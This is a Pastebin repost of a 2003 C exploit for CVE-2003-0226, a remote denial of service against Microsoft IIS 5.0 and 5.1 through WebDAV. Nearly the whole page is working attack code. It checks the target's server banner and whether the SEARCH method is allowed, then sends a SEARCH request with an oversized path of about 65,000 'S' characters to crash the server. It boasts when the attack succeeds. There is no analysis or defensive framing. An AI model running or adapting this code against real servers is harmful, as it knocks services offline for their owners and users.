Advertisement
FlyFar

Microsoft IIS 5.0 < 5.1 - Remote Denial of Service - CVE-2003-0226

Jan 24th, 2024
409
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.76 KB | Cybersecurity | 0 0
  1. /*
  2.  
  3. Microsoft IIS versions 5.0 and 5.1 remote denial of service exploit
  4.  
  5. that makes use of the vulnerability recently published by SPI dynamics
  6.  
  7. Published on 31.05.2003
  8.  
  9. */
  10.  
  11. #include <windows.h>
  12. #include <winsock.h>
  13. #include <stdio.h>
  14.  
  15. #pragma comment (lib,"ws2_32")
  16.  
  17. void graphitte()
  18.  
  19. {printf("\n********************************** ");
  20. printf("\n   Webdav MICROSOFT IIS DoS Exploit     * \n");
  21. printf("+++++++++++++++++++++++++++++++*\n");
  22. printf(" by Shachank Pandrey                                *\n");
  23. printf("*************************************\n");
  24.  
  25. }
  26.  
  27. char *funk(char tobesent[100],char *host)
  28. {
  29. int s; char got[100];
  30.  
  31. WSADATA wsaData;
  32.  
  33. struct hostent *yo;
  34. struct sockaddr_in heck;
  35.  
  36. char lala[100];
  37.  
  38.  
  39. if(WSAStartup(0x0101,&wsaData)!=0) {
  40. printf("error starting winsock..");
  41. return 0;
  42. }
  43.  
  44. if ((yo = gethostbyname(host))==0){
  45. printf("error: can't resolve '%s'",host);
  46. return 0;
  47. }
  48.  
  49.  
  50. heck.sin_port = htons(80);
  51. heck.sin_family = AF_INET;
  52. heck.sin_addr = *((struct in_addr *)yo->h_addr);
  53.  
  54. if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  55. printf("Error: Unable to create socket");
  56.  
  57. }
  58.  
  59.  
  60. if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){
  61. printf("Error: Cudn't Connect\r\n");
  62.  
  63. }
  64.  
  65. memset(lala,0,sizeof(lala));
  66.  
  67. sprintf(lala,"%s",tobesent,sizeof(tobesent));
  68.  
  69. send(s,lala,strlen(lala),0);
  70. recv(s,got,100,0);
  71.  
  72. return got;
  73. closesocket(s);
  74. WSACleanup();
  75. printf("done.\n");
  76.  
  77. }
  78.  
  79.  
  80. int main(int argc, char *argv[])
  81. {
  82.  
  83. WSADATA wsaData;
  84.  
  85. int s;char mysend[100];
  86. char *gotme;
  87. char trash[100];
  88.  
  89.  
  90. struct hostent *yo;
  91. struct sockaddr_in heck;
  92. char buffer[65535] ="";
  93. char myrequest[80000];
  94. char content[] =
  95. "<?xml version=\"1.0\"?>\r\n"
  96. "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
  97. "<g:sql>\r\n"
  98. "Select \"DAV:displayname\" from scope()\r\n"
  99. "</g:sql>\r\n"
  100. "</g:searchrequest>\r\n";
  101.  
  102.  
  103.  
  104. graphitte();
  105.  
  106. if(WSAStartup(0x0101,&wsaData)!=0) {
  107. printf("Error :Cudn't initiate winsock!");
  108. return 0;
  109. }
  110.  
  111. if(argc<2)
  112.  
  113. {printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]);
  114. exit(0);}
  115.  
  116. if ( (yo = gethostbyname(argv[1]))==0)
  117. {
  118. printf("error: can't resolve '%s'",argv[1]);
  119. return 1;
  120. }
  121.  
  122. printf("\nChecking web server %s\n",argv[1]);
  123. gotme=(char *)funk("GET / HTTP/1.0\r\n\n",argv[1]);
  124.  
  125.  
  126. if (strstr(gotme,"IIS/5.0") == NULL)
  127.  
  128. { printf("\n\r----> %s is not running IIS 5.0! adios !\n",argv[1]); }
  129.  
  130.  
  131. else
  132.  
  133. {
  134.  
  135. printf("\n\r----> Aww rite! IIS 5.0 found on %s !\n",argv[1]);
  136.  
  137. sprintf(mysend,"SEARCH / HTTP/1.0\r\n\n",40);
  138.  
  139. gotme=(char *)funk(mysend,argv[1]);
  140.  
  141. if (strstr(gotme,"HTTP/1.1 411 Length Required") != NULL)
  142.  
  143. { printf("\n\r----> METHOD SEARCH ALLOWED\r\n"); }
  144.  
  145.  
  146. else
  147.  
  148. {
  149.  
  150. printf("\n----> Method SEARCH not Allowed ! adios...\n");
  151. exit(0);
  152.  
  153. }
  154.  
  155. heck.sin_port = htons(80);
  156. heck.sin_family = AF_INET;
  157. heck.sin_addr = *((struct in_addr *)yo->h_addr);
  158.  
  159. if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  160. printf("error: can't create socket");
  161. return 1;
  162. }
  163.  
  164.  
  165. if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){
  166. printf("Error:Cudn't Connect\r\n");
  167. return 1;
  168. }
  169.  
  170. buffer[sizeof(buffer)]=0x00;
  171.  
  172. memset(buffer,'S',sizeof(buffer));
  173. memset(myrequest,0,sizeof(myrequest));
  174. memset(trash,0,sizeof(trash));
  175. sprintf(myrequest,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\
  176. nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
  177. sprintf(myrequest,"%s%d\r\n\r\n",myrequest,strlen(content));
  178. printf("\r\nDoSsing the server...<pray>\n");
  179. send(s,myrequest,strlen(myrequest),0);
  180.  
  181. send(s,content,strlen(content),0);
  182.  
  183. recv(s,trash,sizeof(trash),0);
  184. if(trash[0]==0x00)
  185. {
  186. printf("Server is DoSsed! Now run !! F-B-eyee is after j00...\r\n");
  187.  
  188. }
  189. else
  190.  
  191. printf("Server is prolly patched.\r\n");
  192.  
  193. closesocket(s);
  194.  
  195.  
  196. }
  197.  
  198. WSACleanup();
  199.  
  200. return 1;
  201. }
  202.  
  203. // milw0rm.com [2003-05-31]
  204.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement